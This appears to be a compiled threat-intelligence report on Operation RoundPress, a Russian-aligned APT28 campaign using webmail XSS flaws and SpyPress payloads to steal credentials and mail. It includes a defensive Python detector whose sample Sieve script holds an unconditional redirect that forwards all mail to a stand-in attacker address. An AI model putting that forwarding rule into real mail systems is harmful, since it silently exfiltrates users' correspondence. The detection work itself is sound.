Introduction
Operation RoundPress is a sophisticated cyber espionage campaign conducted by the Russian-aligned group Fancy Bear, also known as Sednit or APT28 [1] [2] [4]. Initiated in 2023, this operation targets vulnerable high-value webmail servers [1] [2] [4] [7] [10], primarily focusing on entities linked to the conflict in Ukraine. The campaign's global reach and the group's track record underscore the persistent threat posed by state-sponsored cyber actors.
Description
Operation RoundPress is a covert cyber espionage campaign orchestrated by the Russian-aligned group known as Fancy Bear [7], or Sednit, also referred to as APT28. Initiated in 2023, this operation primarily targets high-value webmail servers with cross-site scripting (XSS) vulnerabilities, aiming to extract sensitive identity data from specific email accounts. The majority of the targets are linked to the ongoing conflict in Ukraine [4], including Ukrainian governmental entities and defense contractors in Bulgaria [1] [2] [4] [8] [9] [10] [11], as well as military and civil aviation organizations within the European Union. The group has a history of significant cyber operations [7], including the 2016 hack of the Democratic National Committee [7], and is associated with the GRU [7], Russia's main intelligence directorate [7] [8].
RoundPress has extended its reach beyond Ukraine, affecting national governments and organizations in Africa, South America [2] [7] [9], Greece [3] [5] [8] [11], Romania [1] [2] [3] [5] [8] [9] [10] [11], Cameroon [3] [5] [8] [11], and Ecuador [5], underscoring the global implications of this cyber threat. Experts warn that North American entities [7], particularly in government and critical infrastructure sectors [7], could also be at risk due to the group’s historical targeting patterns [7].
The operation exploits multiple vulnerabilities in webmail servers [11], particularly Roundcube [7] [11], Horde [3] [5] [6] [7] [8] [10], MDaemon [3] [5] [6] [7] [8] [10], and Zimbra [1] [3] [5] [6] [7] [8] [10], through XSS attacks. Notably, it has utilized a zero-day vulnerability in the MDaemon email server [8], identified as CVE-2024-11182 [8], which allows attackers to execute arbitrary JavaScript code within the webmail interface [8]. The attackers have also exploited two XSS flaws in Roundcube and an unknown XSS vulnerability in Horde. On September 29, 2023 [10], a spearphishing email associated with this operation was detected [10], exploiting CVE-2023-43770 in Roundcube [10]. These spearphishing emails are designed to bypass spam filters and often feature convincing subject lines related to current events, such as arrests in Ukraine and geopolitical developments. Successful exploitation requires only that the target open the email in a vulnerable webmail portal [2]; the malicious JavaScript then executes in the background with no further action from the victim [5].
The primary objective of the operation is to extract sensitive information from specific email accounts, employing various XSS exploits delivered via these emails [1]. Notable JavaScript payloads used in these attacks include SpyPress.HORDE, SpyPress.MDAEMON [1] [2] [11], SpyPress.ROUNDCUBE [1] [2] [11], and SpyPress.ZIMBRA [1] [2] [11]. These payloads facilitate the exfiltration of credentials, address books [1] [2], contacts [1] [2] [5] [6], login history [1] [2], and email messages [1] [2] [5]. The SpyPress.MDAEMON variant is particularly concerning, as it can bypass two-factor authentication by extracting the authentication secret and generating an app password [1] [2], allowing persistent access to the mailbox through a mail application [2]. Additionally, SpyPress.ROUNDCUBE can create Sieve rules to forward emails to attacker-controlled addresses [11], with some variants designed to reload each time the victim opens the malicious email [10].
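Because SpyPress.ROUNDCUBE persists by adding Sieve rules that redirect mail to attacker-controlled addresses, one practical check is to audit each mailbox's Sieve script for redirect actions pointing outside the organization's own domains. The following is an added example (not code from the original report or from any of the cited vendors); it assumes the Sieve scripts have already been exported from the server, and the sample script, the organization domain "example.org", and the collector address are constructed for illustration.

```python
import re
from typing import Dict, List, Set

# Constructed sample Sieve script: one legitimate filing rule followed by an
# unconditional "if true" block that silently copies every message off-site.
SAMPLE_SIEVE = """require ["fileinto", "copy"];
if header :contains "subject" "invoice" {
    fileinto "Finance";
}
if true {
    redirect :copy "collector@example-attacker.invalid";
}
"""

# Assumed: the organization's own mail domains; anything else is "external".
ORG_DOMAINS: Set[str] = {"example.org"}

# Matches `redirect "addr"` and `redirect :copy "addr"` (the :copy tag keeps a
# local copy so the victim does not notice mail disappearing).
REDIRECT_RE = re.compile(r'redirect\s+(?::copy\s+)?"([^"]+)"', re.IGNORECASE)


def find_external_redirects(script: str, org_domains: Set[str]) -> List[Dict[str, object]]:
    """Return every redirect whose target domain is not an org domain.

    Each finding records the script line, the full target address, its domain,
    and whether the redirect sits inside an unconditional `if true` block,
    which is the catch-all shape a forwarding backdoor typically uses.
    """
    findings: List[Dict[str, object]] = []
    unconditional = False
    for lineno, line in enumerate(script.splitlines(), start=1):
        stripped = line.strip().lower()
        if stripped.startswith("if true"):
            unconditional = True
        elif stripped.startswith("}"):
            unconditional = False
        for match in REDIRECT_RE.finditer(line):
            target = match.group(1)
            domain = target.rsplit("@", 1)[-1].lower()
            if domain not in org_domains:
                findings.append({"line": lineno, "target": target,
                                 "domain": domain, "unconditional": unconditional})
    return findings


if __name__ == "__main__":
    for hit in find_external_redirects(SAMPLE_SIEVE, ORG_DOMAINS):
        print(f"line {hit['line']}: redirect to {hit['target']} "
              f"(unconditional={hit['unconditional']})")
```

Run this over every user's active script (for example, the contents of the user's `.sieve` files on a Dovecot host) and treat any unconditional external redirect as an incident to investigate rather than a rule to quietly delete.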
The ongoing exploitation of webmail vulnerabilities highlights the critical need for timely security patches and robust protective measures against such targeted espionage activities [11]. The group’s success in targeting email servers is attributed to organizations’ failure to apply security patches promptly [8], as most vulnerabilities exploited were publicly disclosed and patched before the attacks [8]. The prevalence of unpatched vulnerabilities in webmail servers has made them prime targets for espionage groups, including Sednit [1] [2] [3] [5] [7] [10], emphasizing the urgent need for organizations to patch and audit their systems to mitigate these risks. Enhanced cybersecurity measures are particularly recommended for governments and organizations in Ukraine and those supporting Ukraine [8], in light of the ongoing threat from Russian state-sponsored cyber actors [8].
Conclusion
The global reach and sophistication of Operation RoundPress highlight the significant threat posed by state-sponsored cyber espionage. The campaign’s success underscores the critical importance of timely security updates and robust cybersecurity measures. Organizations [1] [3] [5] [6] [7] [8] [9] [11], particularly those in high-risk sectors, must prioritize patching vulnerabilities and enhancing their security protocols to mitigate the risks associated with such advanced cyber threats. The ongoing geopolitical tensions further emphasize the need for vigilance and proactive defense strategies to protect sensitive information from being compromised.
References
[1] https://www.eset.com/us/about/newsroom/research/eset-research-uncovers-operation-roundpress-russia-aligned-sednit-targets-entities-linked-to-the-ukraine-war-to-steal-confidential-data/
[2] https://www.helpnetsecurity.com/2025/05/15/espionage-operation-roundpress-webmail-servers/
[3] https://securityonline.info/operation-roundpress-sednit-weaponizes-xss-to-breach-global-webmail-servers/
[4] https://cyber.vumetric.com/security-news/2025/05/15/russia-linked-hackers-target-webmail-servers-in-ukraine-related-espionage-operation/
[5] https://www.techradar.com/pro/security/global-russian-hacking-campaign-steals-data-from-government-agencies
[6] https://www.welivesecurity.com/en/videos/sednit-xss-govt-entities-defense-companies/
[7] https://www.scworld.com/news/sednit-groups-operation-roundpress-targets-webmail-servers-globally
[8] https://fieldeffect.com/blog/russian-apt28-hackers-leverage-webmail-zero-day
[9] https://www.infosecurity-magazine.com/news/fancy-bear-russia-cyber-espionage/
[10] https://www.welivesecurity.com/en/eset-research/operation-roundpress/
[11] https://hackread.com/russia-spypress-malware-exploits-webmails-spy-ukraine/